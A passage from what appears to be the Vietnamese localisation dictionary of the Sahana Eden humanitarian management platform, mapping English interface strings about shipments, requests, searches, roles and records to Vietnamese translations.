'RFA4: Lập kế hoạch cho Chuẩn bị, Ứng phó và Phục hồi hiệu quả', 'RFA5: Effective, Integrated and People-Focused Early Warning Systems': 'RFA5: Hệ thống cảnh báo sớm hiệu quả, tích hợp và chú trọng vào con người', 'RFA6: Reduction of Underlying Risk Factors': 'RFA6: Giảm thiểu những nhân tố rủi ro cơ bản', 'Race': 'Chủng tộc', 'Radio Callsign': 'Tín hiệu điện đàm', 'Radiological Hazard': 'Hiểm họa phóng xạ', 'Railway Accident': 'Tai nạn đường sắt', 'Railway Hijacking': 'Cướp tàu hỏa', 'Rain Fall': 'Mưa lớn', 'Rapid Assessments': 'Đánh giá nhanh', 'Rapid Close Lead': 'Nhanh chóng đóng lại', 'Rapid Data Entry': 'Nhập dữ liệu nhanh', 'Raw Database access': 'Truy cập cơ sở dữ liệu gốc', 'Ready': 'Sẵn sàng', 'Reason': 'Lý do', 'Receive %(opt_in)s updates:': 'Nhận %(opt_in)s cập nhật', 'Receive New Shipment': 'Nhận lô hàng mới', 'Receive Shipment': 'Nhận lô hàng', 'Receive updates': 'Nhập cập nhật', 'Receive': 'Nhận', 'Receive/Incoming': 'Nhận/ Đến', 'Received By': 'Nhận bởi', 'Received Shipment Details': 'Thông tin về lô hàng nhận', 'Received Shipment canceled': 'Lô hàng nhận đã bị hoãn', 'Received Shipment updated': 'Lô hàng nhận đã được cập nhật', 'Received Shipments': 'Hàng nhận', 'Received date': 'Ngày nhận', 'Received': 'Đã được nhận', 'Received/Incoming Shipments': 'Lô hàng nhận/đến', 'Receiving Inventory': 'Nhận hàng tồn kho', 'Reception': 'Nhận', 'Recipient': 'Người nhận', 'Recipient(s)': 'Người nhận', 'Recipients': 'Những người nhận', 'Record Deleted': 'Hồ sơ bị xóa', 'Record Details': 'Chi tiết hồ sơ', 'Record added': 'Hồ sơ được thêm', 'Record already exists': 'Bản lưu đã tồn tại', 'Record approved': 'Hồ sơ được chấp thuân', 'Record could not be approved.': 'Hồ sơ không được chấp thuận', 'Record could not be deleted.': 'Hồ sơ không thể xóa', 'Record deleted': 'Hồ sơ bị xóa', 'Record not found!': 'Không tìm thấy bản lưu!', 'Record not found': 'Không tìm thấy hồ sơ', 'Record updated': 'Hồ sơ được cập nhật', 'Record': 'Hồ sơ', 'Records': 'Các hồ sơ', 'Recovery Request added': 'Đã thêm yêu cầu phục hồi', 'Recovery Request deleted': 'phục hồi các yêu cầu bị xóa', 'Recovery Request updated': 'Cập nhật Yêu cầu phục hồi', 'Recovery Request': 'Phục hồi yêu cầu', 'Recovery Requests': 'Phục hồi yêu cầu', 'Recovery': 'Phục hồi', 'Recurring costs': 'Chi phí định kỳ', 'Recurring': 'Định kỳ', 'Red Cross & Red Crescent National Societies': 'Các Hội Chữ thập đỏ & Trăng lưỡi liềm đỏ Quốc gia', 'Red Cross Employment History': 'Quá trình công tác trong Chữ thập đỏ', 'Refresh Rate (seconds)': 'Tỉ lệ làm mới (giây)', 'Region Location': 'Địa điểm vùng', 'Region': 'Vùng', 'Regional': 'Địa phương', 'Register As': 'Đăng ký là', 'Register Person into this Shelter': 'Đăng ký cá nhân vào nơi cư trú', 'Register Person': 'Đăng ký Cá nhân', 'Register for Account': 'Đăng ký tài khoản', 'Register': 'Đăng ký', 'Registered People': 'Những người đã đăng ký', 'Registered users can %(login)s to access the system': 'Người sử dụng đã đăng ký có thể %(đăng nhập)s để truy cập vào hệ thống', 'Registered users can': 'Người dùng đã đăng ký có thể', 'Registration Details': 'Chi tiết đăng ký', 'Registration added': 'Bản đăng ký đã được thêm', 'Registration not permitted': 'Việc đăng ký không được chấp thuận', 'Reject request submitted': 'Đề nghị từ chối đã được gửi đi', 'Reject': 'Từ chối', 'Relationship': 'Mối quan hệ', 'Relief Team': 'Đội cứu trợ', 'Religion': 'Tôn giáo', 'Reload': 'Tải lại', 'Remarks': 'Những nhận xét', 'Remember Me': 'Duy trì đăng nhập', 'Remote Error': 'Lỗi từ xa', 'Remove Feature: Select the feature you wish to remove & press the delete key': 'Chức năng gỡ bỏ: Lựa chọn chức năng bạn muốn gõ bỏ và ấn phím xóa', 'Remove Human Resource from this incident': 'Xóa nguồn Nhân lực khỏi sự việc này', 'Remove Layer from Profile': 'Xóa Lớp khỏi Hồ sơ', 'Remove Layer from Symbology': 'Xóa Lớp khỏi Biểu tượng', 'Remove Organization from Project': 'Xóa Tổ chức khỏi Dự án', 'Remove Person from Commitment': 'Xóa Người khỏi Cam kết', 'Remove Person from Group': 'Xóa Người khỏi Nhóm', 'Remove Person from Team': 'Xóa Người khỏi Đội', 'Remove Profile Configuration for Layer': 'Xóa Cấu hình hồ sơ cho Lớp', 'Remove Skill from Request': 'Xóa Kỹ năng khỏi Đề nghị', 'Remove Skill': 'Xóa Kỹ năng', 'Remove Stock from Warehouse': 'Xóa Hàng hóa khỏi Nhà kho', 'Remove Symbology from Layer': 'Xóa Biểu tượng khỏi Lớp', 'Remove Vehicle from this incident': 'Xóa Phương tiện khỏi sự việc này', 'Remove all log entries': 'Xóa toàn bộ ghi chép nhật ký', 'Remove all': 'Gỡ bỏ toàn bộ', 'Remove existing data before import': 'Xóa dữ liệu đang tồn tại trước khi nhập', 'Remove selection': 'Gỡ bỏ có lựa chọn', 'Remove this entry': 'Gỡ bỏ hồ sơ này', 'Remove': 'Gỡ bỏ', 'Reopened': 'Được mở lại', 'Repacked By': 'Được đóng gói lại bởi', 'Repair': 'Sửa chữa', 'Repaired': 'Được sửa chữa', 'Repeat your password': 'Nhập lại mật khẩu', 'Repeat': 'Lặp lại', 'Replace if Newer': 'Thay thế nếu mới hơn', 'Replace': 'Thay thế', 'Replacing or Provisioning Livelihoods': 'Thay thế hoặc Cấp phát sinh kế', 'Replies': 'Trả lời', 'Reply Message': 'Trả lời tin nhắn', 'Reply': 'Trả lời', 'Report Date': 'Ngày báo cáo', 'Report Details': 'Chi tiết báo cáo', 'Report Options': 'Lựa chọn yêu cầu báo cáo', 'Report To': 'Báo cáo cho', 'Report Type': 'Loại báo cáo', 'Report a Problem with the Software': 'báo cáo lỗi bằng phần mềm', 'Report added': 'Đã thêm báo cáo', 'Report by Age/Gender': 'Báo cáo theo tuổi/ giới tính', 'Report deleted': 'Đã xóa báo cáo', 'Report my location': 'Báo cáo vị trí ', 'Report of': 'Báo cáo theo', 'Report on Annual Budgets': 'Báo cáo về Ngân sách năm', 'Report on Themes': 'Báo cáo về Chủ đề', 'Report the contributing factors for the current EMS status.': 'Báo cáo các nhân tố đóng góp cho tình trạng EMS hiện tại.', 'Report': 'Báo cáo', 'Report': 'Báo cáo', 'Reported By (Not Staff)': 'Được báo cáo bởi (không phải nhân viên)', 'Reported By (Staff)': 'Được báo cáo bởi (nhân viên)', 'Reported To': 'Được báo cáo tới', 'Reported': 'Được báo cáo', 'Reportlab not installed': 'Chưa cài đặt kho báo cáo', 'Reports': 'Báo cáo', 'Repositories': 'Nơi lưu trữ', 'Repository Base URL': 'Nơi lưu trữ cơ bản URL', 'Repository Configuration': 'Cấu hình nơi lưu trữ', 'Repository Name': 'Tên nơi lưu trữ', 'Repository UUID': 'Lưu trữ UUID', 'Repository configuration deleted': 'Cấu hình nơi lưu trữ đã xóa', 'Repository configuration updated': 'Cấu hình nơi lưu trữ được cập nhật', 'Repository configured': 'Nơi lưu trữ đã được cấu hình', 'Repository': 'Nơi lưu trữ', 'Request Added': 'Đề nghị được thêm vào', 'Request Canceled': 'Đề nghị đã bị hủy', 'Request Details': 'Yêu cầu thông tin chi tiết', 'Request From': 'Đề nghị từ', 'Request Item Details': 'Chi tiết mặt hàng đề nghị', 'Request Item added': 'Đã thêm yêu cầu hàng hóa', 'Request Item deleted': 'Xóa yêu cầu hàng hóa', 'Request Item updated': 'Đã cập nhật hàng hóa yêu cầu', 'Request Item': 'Mặt hàng yêu cầu', 'Request Items': 'Mặt hàng yêu cầu', 'Request New People': 'Yêu cầu cán bộ mới', 'Request Status': 'Tình trạng lời đề nghị', 'Request Stock from Available Warehouse': 'Đề nghị Hàng từ Kho hàng đang có', 'Request Type': 'Loại hình đề nghị', 'Request Updated': 'Đề nghị được cập nhật', 'Request added': 'Yêu cầu được thêm', 'Request deleted': 'Yêu cầu được xóa', 'Request for Role Upgrade': 'yêu cầu nâng cấp vai trò', 'Request from Facility': 'Đề nghị từ bộ phận', 'Request updated': 'Yêu cầu được cập nhật', 'Request': 'Yêu cầu', 'Request, Response & Session': 'Yêu cầu, Phản hồi và Tương tác', 'Requested By': 'Đã được đề nghị bởi', 'Requested For Facility': 'Được yêu cầu cho bộ phận', 'Requested For': 'Đã được đề nghị cho', 'Requested From': 'Đã được đề nghị từ', 'Requested Items': 'Yêu cầu mặt hàng', 'Requested Skill Details': 'Chi tiết kỹ năng đã đề nghị', 'Requested Skill updated': 'Kỹ năng được đề nghị đã được cập nhật', 'Requested Skills': 'Những kỹ năng được đề nghị', 'Requested by': 'Yêu cầu bởi', 'Requested': 'Đã được đề nghị', 'Requester': 'Người đề nghị', 'Requestor': 'Người yêu cầu', 'Requests Management': 'Quản lý những đề nghị', 'Requests for Item': 'Yêu cầu hàng hóa', 'Requests': 'Yêu cầu', 'Required Skills': 'Những kỹ năng cần có ', 'Requires Login!': 'Đề nghị đăng nhập!', 'Requires Login': 'Đề nghị đăng nhập', 'Reset Password': 'Cài đặt lại mật khẩu', 'Reset all filters': 'Tái thiết lập tất cả lựa chọn lọc', 'Reset filter': 'Tái thiết lập lựa chọn lọc', 'Reset form': 'Đặt lại mẫu', 'Reset': 'Thiết lập lại', 'Resolution': 'Nghị quyết', 'Resource Configuration': 'Cấu hình nguồn lực', 'Resource Management System': 'Hệ thống quản lý nguồn lực', 'Resource Mobilization': 'Huy động nguồn lực', 'Resource Name': 'Tên nguồn lực', 'Resource configuration deleted': 'Cấu hình nguồn lực đã xóa', 'Resource configuration updated': 'Cầu hình nguồn lực được cập nhật', 'Resource configured': 'Nguồn lực đã được cấu hình', 'Resources': 'Những nguồn lực', 'Responder(s)': 'Người ứng phó', 'Response deleted': 'Xóa phản hồi', 'Response': 'Ứng phó', 'Responses': 'Các đợt ứng phó', 'Restarting Livelihoods': 'Tái khởi động nguồn sinh kế', 'Results': 'Kết quả', 'Retail Crime': 'Chiếm đoạt tài sản để bán', 'Retrieve Password': 'Khôi phục mật khẩu', 'Return to Request': 'Trở về Đề nghị', 'Return': 'Trở về', 'Returned From': 'Được trả lại từ', 'Returned': 'Đã được trả lại', 'Returning': 'Trả lại', 'Review Incoming Shipment to Receive': 'Rà soát Lô hàng đến để Nhận', 'Review next': 'Rà soát tiếp', 'Review': 'Rà soát', 'Revised Quantity': 'Số lượng đã được điều chỉnh', 'Revised Status': 'Tình trạng đã được điều chỉnh', 'Revised Value per Pack': 'Giá trị mỗi Gói đã được điều chỉnh', 'Riot': 'Bạo động', 'Risk Identification & Assessment': 'Đánh giá và Xác định rủi ro', 'Risk Transfer & Insurance': 'Bảo hiểm và hỗ trợ tài chính nhằm ứng phó với rủi ro', 'Risk Transfer': 'Hỗ trợ tài chính nhằm ứng phó với rủi ro', 'River Details': 'Chi tiết Sông', 'River': 'Sông', 'Road Accident': 'Tai nạn đường bộ', 'Road Closed': 'Đường bị chặn', 'Road Delay': 'Cản trở giao thông đường bộ', 'Road Hijacking': 'Tấn công trên đường', 'Road Safety': 'An toàn đường bộ', 'Road Usage Condition': 'Tình hình sử dụng đường sá', 'Role Details': 'Chi tiết về vai trò', 'Role Name': 'Tên chức năng', 'Role Required': 'Chức năng được yêu cầu', 'Role added': 'Vai trò được thêm vào', 'Role assigned to User': 'Chức năng được cấp cho người sử dụng này', 'Role deleted': 'Vai trò đã xóa', 'Role updated': 'Vai trò được cập nhật', 'Role': 'Vai trò', 'Roles Permitted': 'Các chức năng được cho phép', 'Roles currently assigned': 'Các chức năng được cấp hiện tại', 'Roles of User': 'Các chức năng của người sử dụng', 'Roles updated': 'Các chức năng được cập nhật', 'Roles': 'Vai trò', 'Room Details': 'Chi tiết về phòng', 'Room added': 'Phòng được thêm vào', 'Room deleted': 'Phòng đã xóa', 'Room updated': 'Phòng được cập nhật', 'Room': 'Phòng', 'Rooms': 'Những phòng', 'Rotation': 'Sự luân phiên', 'Rows in table': 'Các hàng trong bảng', 'Rows selected': 'Các hàng được chọn', 'Rows': 'Các dòng', 'Run Functional Tests': 'Kiểm thử chức năng', 'Run every': 'Khởi động mọi hàng', 'S3Pivottable unresolved dependencies': 'Các phụ thuộc không được xử lý S3pivottable', 'SMS Modems (Inbound & Outbound)': 'Modem SMS (gửi ra & gửi đến)', 'SMS Outbound': 'SMS gửi ra', 'SMS Settings': 'Cài đặt tin nhắn', 'SMS settings updated': 'Cập nhật cài đặt SMS', 'SMTP to SMS settings updated': 'Cập nhật cài đặt SMTP to SMS', 'SOPS and Guidelines Development': 'Xây dựng Hướng dẫn và Quy trình chuẩn', 'STRONG': 'MẠNH', 'SUBMIT DATA': 'GỬI DỮ LIỆU', 'Sahana Administrator': 'Quản trị viên Sahana', 'Sahana Community Chat': 'Nói chuyện trên cộng đồng Sahana', 'Sahana Eden Humanitarian Management Platform': 'Diễn đàn Quản lý nhân đạo Sahana Eden', 'Sahana Eden Website': 'Trang thông tin Sahana Eden', 'Sahana Eden portable application generator': 'Bộ sinh ứng dụng cầm tay Sahana Eden', 'Sahana Login Approval Pending': 'Chờ chấp nhận đăng nhập vào Sahana', 'Salary': 'Lương', 'Salary Coefficient': 'Hệ số', 'Sale': 'Bán hàng', 'Satellite': 'Vệ tinh', 'Save and add Items': 'Lưu và thêm Hàng hóa', 'Save and add People': 'Lưu và thêm Người', 'Save any Changes in the one you wish to keep': 'Lưu mọi thay đổi ở bất kỳ nơi nào bạn muốn', 'Save search': 'Lưu tìm kiếm', 'Save this search': 'Lưu tìm kiếm này', 'Save': 'Lưu', 'Save: Default Lat, Lon & Zoom for the Viewport': 'Lưu: Mặc định kinh độ, vĩ độ & phóng ảnh cho cổng nhìn', 'Saved Queries': 'Các thắc mắc được lưu', 'Saved Searches': 'Những tìm kiếm đã lưu', 'Saved search added': 'Tìm kiếm đã lưu đã được thêm vào', 'Saved search deleted': 'Tìm kiếm được lưu đã xóa', 'Saved search details': 'Chi tiết về tìm kiếm đã lưu', 'Saved search updated': 'Tìm kiếm đã lưu đã được cập nhật', 'Saved searches': 'Những tìm kiếm đã lưu', 'Scale of Results': 'Phạm vi của kết quả', 'Scale': 'Kích thước', 'Scanned Copy': 'Bản chụp điện tử', 'Scanned Forms Upload': 'Tải lên mẫu đã quyét', 'Scenarios': 'Các kịch bản', 'Schedule synchronization jobs': 'Các công việc được điều chỉnh theo lịch trình', 'Schedule': 'Lịch trình', 'Scheduled Jobs': 'Công việc đã được lập kế hoạch', 'Schema': 'Giản đồ', 'School Closure': 'Đóng cửa trường học', 'School Health': 'CSSK trong trường học', 'School Lockdown': 'Đóng cửa trường học', 'School tents received': 'Đã nhận được lều gửi cho trường học ', 'School/studying': 'Trường học', 'Seaport': 'Cảng biển', 'Seaports': 'Các cảng biển', 'Search & List Catalog': 'Tìm kiếm và liệt kê các danh mục', 'Search & List Category': 'Tìm và liệt kê danh mục', 'Search & List Items': 'Tìm kiếm và hiển thị danh sách hàng hóa', 'Search & List Locations': 'Tìm và liệt kê các địa điểm', 'Search & List Sub-Category': 'Tìm kiếm và lên danh sách Tiêu chí phụ', 'Search & Subscribe': 'Tìm kiếm và Đặt mua', 'Search Activities': 'Tìm kiếm hoạt động', 'Search Addresses': 'Tìm kiếm địa chỉ', 'Search Affiliations': 'Tìm kiếm chi nhánh', 'Search Aid Requests': 'Tìm kiếm Yêu cầu cứu trợ', 'Search Alternative Items': 'Tìm kiếm mục thay thế', 'Search Annual Budgets': 'Tìm kiếm các ngân sách năm', 'Search Assessments': 'Tìm kiếm các đánh giá', 'Search Asset Log': 'Tìm kiếm nhật ký tài sản', 'Search Assets': 'Tìm kiếm tài sản', 'Search Assigned Human Resources': 'Tìm kiếm người được phân công', 'Search Beneficiaries': 'Tìm kiếm những người hưởng lợi', 'Search Beneficiary Types': 'Tìm kiếm những nhóm người hưởng lợi', 'Search Branch Organizations': 'Tìm kiếm tổ chức chi nhánh', 'Search Brands': 'Tìm kiếm nhãn hàng', 'Search Budgets': 'Tìm kiếm các ngân sách', 'Search Catalog Items': 'Tìm kiếm mặt hàng trong danh mục', 'Search Catalogs': 'Tìm kiếm danh mục', 'Search Certificates': 'Tìm kiếm chứng chỉ', 'Search Certifications': 'Tìm kiếm bằng cấp', 'Search Checklists': 'Tìm kiếm Checklist', 'Search Clusters': 'Tìm kiếm nhóm', 'Search Commitment Items': 'Tìm kiếm mục cam kết', 'Search Commitments': 'Tìm kiếm cam kết', 'Search Committed People': 'Tìm kiếm người được cam kết', 'Search Community Contacts': 'Tìm kiếm thông tin liên lạc của cộng đồng', 'Search Community': 'Tìm kiếm cộng đồng', 'Search Competency Ratings': 'Tìm kiếm đánh giá năng lực', 'Search Contact Information': 'Tìm kiếm thông tin liên hệ', 'Search Contacts': 'Tìm kiếm liên lạc', 'Search Course Certificates': 'Tìm kiếm chứng chỉ đào tạo', 'Search Courses': 'Tìm kiếm khóa đào tạo', 'Search Credentials': 'Tìm kiếm giấy chứng nhận', 'Search Demographic Data': 'Tìm kiếm dữ liệu nhân khẩu học', 'Search Demographic Sources': 'Tìm kiếm nguồn dữ liệu dân số', 'Search Demographics': 'Tìm kiếm số liệu thống kê dân số', 'Search Departments': 'Tìm kiếm phòng/ban', 'Search Distributions': 'Tìm kiếm Quyên góp', 'Search Documents': 'Tìm kiếm tài liệu', 'Search Donors': 'Tìm kiếm nhà tài trợ', 'Search Education Details': 'Tìm kiếm thông tin đào tạo', 'Search Email InBox': 'Tìm kiếm thư trong hộp thư đến', 'Search Entries': 'Tìm kiếm hồ sơ', 'Search Facilities': 'Tìm kiếm trang thiết bị', 'Search Facility Types': 'Tìm kiếm loại hình bộ phận', 'Search Feature Layers': 'Tìm kiếm lớp tính năng', 'Search Flood Reports': 'Tìm các báo cáo về lũ lụt', 'Search Frameworks': 'Tìm kiếm khung chương trình', 'Search Groups': 'Tìm kiếm nhóm', 'Search Hospitals': 'Tìm kếm các bệnh viện', 'Search Hours': 'Tìm kiếm theo thời gian hoạt động', 'Search Identity': 'Tìm kiếm nhận dạng', 'Search Images': 'Tìm kiếm hình ảnh', 'Search Incident Reports': 'Tìm kiếm báo cáo sự việc', 'Search Item Catalog(s)': 'Tìm kiếm Catalog hàng hóa', 'Search Item Categories': 'Tìm kiếm nhóm mặt hàng', 'Search Item Packs': 'Tìm kiếm gói hàng', 'Search Items in Request': 'Tìm kiếm mặt hàng đang đề nghị', 'Search Items': 'Tìm kiếm mặt hàng', 'Search Job Roles': 'Tìm kiếm vai trò của công việc', 'Search Job Titles': 'Tìm kiếm chức danh công việc', 'Search Keys': 'Tìm kiếm mã', 'Search Kits': 'Tìm kiếm bộ dụng cụ', 'Search Layers': 'Tìm kiếm lớp', 'Search Location Hierarchies': 'Tìm kiếm thứ tự địa điểm', 'Search Location': 'Tìm kiếm địa điểm', 'Search Locations': 'Tìm kiếm địa điểm', 'Search Log Entry': 'Tìm kiếm ghi chép nhật ký', 'Search Logged Time': 'Tìm kiếm thời gian đăng nhập', 'Search Mailing Lists': 'Tìm kiếm danh sách gửi thư', 'Search Map Profiles': 'Tìm kiếm cấu hình bản đồ', 'Search Markers': 'Tìm kiếm đánh dấu', 'Search Members': 'Tìm kiếm thành viên', 'Search Membership Types': 'Tìm kiếm loại hình hội viên', 'Search Membership': 'Tìm kiếm hội viên', 'Search Memberships': 'Tim kiếm thành viên', 'Search Metadata': 'Tìm kiếm dữ liệu', 'Search Milestones': 'Tìm kiếm mốc quan trọng', 'Search Office Types': 'Tìm kiếm loại hình văn phòng', 'Search Offices': 'Tìm kiếm văn phòng', 'Search Open Tasks for %(project)s': 'Tìm kiếm Công việc Chưa được xác định cho %(project)s', 'Search Orders': 'Tìm kiếm đơn hàng', 'Search Organization Domains': 'Tìm kiếm lĩnh vực hoạt động của tổ chức', 'Search Organization Types': 'Tìm kiếm loại hình tổ chức', 'Search Organizations': 'Tìm kiếm tổ chức', 'Search Participants': 'Tìm kiếm người tham dự', 'Search Partner Organizations': 'Tìm kiếm tổ chức thành viên', 'Search Persons': 'Tìm kiếm người', 'Search Photos': 'Tìm kiếm hình ảnh', 'Search Professional Experience': 'Tìm kiếm kinh nghiệm nghề nghiệp', 'Search Programs': 'Tìm kiếm chương trình', 'Search Project Organizations': 'Tìm kiếm tổ chức dự án', 'Search Projections': 'Tìm kiếm dự đoán', 'Search Projects': 'Tìm kiếm dự án', 'Search Received/Incoming Shipments': 'Tìm kiếm lô hàng đến/nhận', 'Search Records': 'Tìm kiếm hồ sơ', 'Search Red Cross & Red Crescent National Societies': 'Tìm kiếm Hội Chữ thập đỏ và Trăng lưỡi liềm đỏ Quốc gia', 'Search Registations': 'Tìm kiếm các đăng ký', 'Search Registration Request': 'Tìm kiếm Yêu cầu Đăng ký', 'Search Report': 'Tìm kiếm báo cáo', 'Search Reports': 'Tìm kiếm Báo cáo', 'Search Request Items': 'Tìm kiếm Yêu cầu hàng hóa', 'Search Request': 'Tìm kiếm yêu cầu', 'Search Requested Skills': 'Tìm kiếm kỹ năng được đề nghị', 'Search Requests': 'Tìm kiếm đề nghị', 'Search Resources': 'Tìm kiếm các nguồn lực', 'Search Results': 'Tìm kiếm kết quả', 'Search Roles': 'Tìm kiếm vai trò', 'Search Rooms': 'Tìm kiếm phòng', 'Search Sectors': 'Tìm kiếm lĩnh vực', 'Search Sent Shipments': 'Tìm kiếm lô hàng đã gửi', 'Search Shelter Services': 'Tìm kiếm dịch vụ cư trú', 'Search Shelter Types': 'Tìm kiếm Loại Cư trú', 'Search Shipment Items': 'Tìm kiếm mặt hàng của lô hàng', 'Search Shipment/Way Bills': 'Tìm kiếm đơn hàng/hóa đơn vận chuyển', 'Search Shipped Items': 'Tìm kiếm mặt hàng được chuyển', 'Search Skill Equivalences': 'Tìm kiếm kỹ năng tương ứng', 'Search Skill Types': 'Tìm kiếm nhóm kỹ năng', 'Search Skills': 'Tìm kiếm kỹ năng', 'Search Staff & Volunteers': 'Tìm kiếm nhân viên & tình nguyện viên', 'Search Staff Assignments': 'Tìm kiếm công việc của nhân viên', 'Search Staff': 'Tìm kiếm nhân viên', 'Search Stock Adjustments': 'Tìm kiếm điều chỉnh về kho hàng', 'Search Stock Items': 'Tìm kiếm mặt hàng trong kho', 'Search Storage Location(s)': 'Tìm kiếm kho lưu trữ', 'Search Subscriptions': 'Tìm kiếm danh sách, số tiền quyên góp', 'Search Suppliers': 'Tìm kiếm nhà cung cấp', 'Search Support Requests': 'Tìm kiếm yêu cầu được hỗ trợ', 'Search Symbologies': 'Tìm kiếm biểu tượng', 'Search Tasks': 'Tìm kiếm nhiệm vụ', 'Search Teams': 'Tìm kiếm Đội/Nhóm', 'Search Theme Data': 'Tìm kiếm dữ liệu chủ đề', 'Search Themes': 'Tìm kiếm chủ đề', 'Search Tracks': 'Tìm kiếm dấu vết', 'Search Training Events': 'Tìm kiếm khóa tập huấn', 'Search Training Participants': 'Tìm kiếm học viên', 'Search Twilio SMS Inbox': 'Tìm kiếm hộp thư đến SMS Twilio', 'Search Twitter Tags': 'Tìm kiếm liên kết với Twitter', 'Search Units': 'Tìm kiếm đơn vị', 'Search Users': 'Tìm kiếm người sử dụng', 'Search Vehicle Assignments': 'Tìm kiếm việc điều động phương tiện', 'Search Volunteer Cluster Positions': 'Tìm kiếm vị trí của nhóm tình nguyện viên', 'Search Volunteer Cluster Types': 'Tìm kiếm loại hình nhóm tình nguyện viên', 'Search Volunteer Clusters': 'Tìm kiếm nhóm tình nguyện viên', 'Search Volunteer Registrations': 'Tìm kiếm Đăng ký tình nguyện viên', 'Search Volunteer Roles': 'Tìm kiếm vai trò của tình nguyện viên', 'Search Volunteers': 'Tìm kiếm tình nguyện viên', 'Search Vulnerability Aggregated Indicators': 'Tìm kiếm chỉ số theo tình trạng dễ bị tổn thương', 'Search Vulnerability Data': 'Tìm kiếm dữ liệu về tình trạng dễ bị tổn thương', 'Search Vulnerability Indicator Sources': 'Tìm kiếm nguồn chỉ số về tình trạng dễ bị tổn thương', 'Search Vulnerability Indicators': 'Tìm kiếm chỉ số về tình trạng dễ bị tổn thương', 'Search Warehouse Stock': 'Tìm kiếm Hàng trữ trong kho', 'Search Warehouses': 'Tìm kiếm Nhà kho', 'Search and Edit Group': 'Tìm và sửa thông tin nhóm', 'Search and Edit Individual': 'Tìm kiếm và chỉnh sửa cá nhân', 'Search for Activity Type': 'Tìm kiếm nhóm hoạt động', 'Search for Job': 'Tìm kiếm công việc', 'Search for Repository': 'Tìm kiếm Nơi lưu trữ', 'Search for Resource': 'Tìm kiếm nguồn lực', 'Search for a Hospital': 'Tìm kiếm bệnh viện', 'Search for a Location': 'Tìm một địa điểm', 'Search for a Person': 'Tìm kiếm theo tên', 'Search for a Project Community by name.': 'Tìm kiếm cộng đồng dự án theo tên.', 'Search for a Project by name, code, location, or description.': 'Tìm kiếm dự án theo tên, mã, địa điểm, hoặc mô tả.', 'Search for a Project by name, code, or description.': 'Tìm kiếm dự án theo tên, mã, hoặc mô tả.', 'Search for a Project': 'Tìm kiếm dự án', 'Search for a Request': 'Tìm kiếm một yêu cầu', 'Search for a Task by description.': 'Tìm kiếm nhiệm vụ theo mô tả.', 'Search for a shipment by looking for text in any field.': 'Tìm kiếm lô hàng bằng cách nhập từ khóa vào các ô.', 'Search for a shipment received between these dates': 'Tìm kiếm lô hàng đã nhận trong những ngày gần đây', 'Search for an Organization by name or acronym': 'Tìm kiếm tổ chức theo tên hoặc chữ viết tắt', 'Search for an item by Year of Manufacture.': 'Tìm kiếm mặt hàng theo năm sản xuất.', 'Search for an item by brand.': 'Tìm kiếm mặt hàng theo nhãn hàng.', 'Search for an item by catalog.': 'Tìm kiếm mặt hàng theo danh mục.', 'Search for an item by category.': 'Tìm kiếm mặt hàng theo nhóm.', 'Search for an item by its code, name, model and/or comment.': 'Tìm kiếm mặt hàng theo mã, tên, kiểu và/hoặc nhận xét.', 'Search for an item by text.': 'Tìm kiếm mặt hàng theo từ khóa.', 'Search for an order by looking for text in any field.': 'Tìm kiếm đơn đặt hàng bằng cách nhập từ khóa vào các ô.', 'Search for an order expected between these dates': 'Tìm kiếm một đơn hàng dự kiến trong những ngày gần đây', 'Search for office by organization.': 'Tìm kiếm văn phòng theo tổ chức.', 'Search for office by text.': 'Tìm kiếm văn phòng theo từ khóa.', 'Search for warehouse by organization.': 'Tìm kiếm nhà kho theo tổ chức.', 'Search for warehouse by text.': 'Tìm kiếm nhà kho theo từ khóa.', 'Search location in Geonames': 'Tìm kiếm địa điểm theo địa danh', 'Search messages': 'Tìm kiếm tin nhắn', 'Search saved searches': 'Tìm kiếm tìm kiếm được lưu', 'Search': 'Tìm kiếm', 'Secondary Server (Optional)': 'Máy chủ thứ cấp', 'Seconds must be a number between 0 and 60': 'Giây phải là số từ 0 đến 60', 'Seconds must be a number.': 'Giây phải bằng số', 'Seconds must be less than 60.': 'Giây phải nhỏ hơn 60', 'Section Details': 'Chi tiết khu vực', 'Section': 'Lĩnh vực', 'Sections that are part of this template': 'Các lĩnh vực là bộ phận của mẫu này', 'Sector Details': 'Chi tiết lĩnh vực', 'Sector added': 'Thêm Lĩnh vực', 'Sector deleted': 'Xóa Lĩnh vực', 'Sector updated': 'Cập nhật Lĩnh vực', 'Sector': 'Lĩnh vực', 'Sector(s)': 'Lĩnh vực', 'Sectors to which this Theme can apply': 'Lựa chọn Lĩnh vực phù hợp với Chủ đề này', 'Sectors': 'Lĩnh vực', 'Security Policy': 'Chính sách bảo mật', 'Security Required': 'An ninh được yêu cầu', 'Security Staff Types': 'Loại cán bộ bảo vệ', 'See All Entries': 'Xem tất cả hồ sơ', 'See a detailed description of the module on the Sahana Eden wiki': 'Xem chi tiết mô tả Modun trên Sahana Eden wiki', 'See the universally unique identifier (UUID) of this repository': 'Xem Định dạng duy nhất toàn cầu (UUID) của thư mục lưu này', 'Seen': 'Đã xem', 'Select %(location)s': 'Chọn %(location)s', 'Select %(up_to_3_locations)s to compare overall resilience': 'Chọn %(up_to_3_locations)s để so sánh tổng thể Sự phục hồi nhanh', 'Select Existing Location': 'Lựa chọn vị trí đang có', 'Select Items from the Request': 'Chọn Hàng hóa từ Yêu cầu', 'Select Label Question': 'Chọn nhãn câu hỏi', 'Select Modules for translation': 'Lựa chọn các Module để dịch', 'Select Modules which are to be translated': 'Chọn Modun cần dịch', 'Select Numeric Questions (one or more):': 'Chọn câu hỏi về lượng (một hay nhiều hơn)', 'Select Stock from this Warehouse': 'Chọn hàng hóa lưu kho từ một Kho hàng', 'Select This Location': 'Lựa chọn vị trí này', 'Select a Country': 'Chọn nước', 'Select a commune to': 'Chọn xã đến', 'Select a label question and at least one numeric question to display the chart.': 'Chọn nhãn câu hỏi và ít nhất 1 câu hỏi về lượng để thể hiện biểu đồ', 'Select a location': 'Lựa chọn Quốc gia', 'Select a question from the list': 'Chọn một câu hỏi trong danh sách', 'Select all modules': 'Chọn mọi Modun', 'Select all that apply': 'Chọn tất cả các áp dụng trên', 'Select an Organization to see a list of offices': 'Chọn một Tổ chức để xem danh sách văn phòng', 'Select an existing bin': 'Lựa chọn ngăn có sẵn', 'Select an office': 'Chọn một văn phòng', 'Select any one option that apply': 'Lựa chọn bất cứ một lựa chọn được áp dụng', 'Select data type': 'Chọn loại dữ liệu', 'Select from registry': 'Chọn từ danh sách đã đăng ký', 'Select language code': 'Chọn mã ngôn ngữ', 'Select one or more option(s) that apply': 'Lựa một hoặc nhiều lựa chọn được áp dụng', 'Select the default site.': 'Lựa chọn trang mặc định', 'Select the language file': 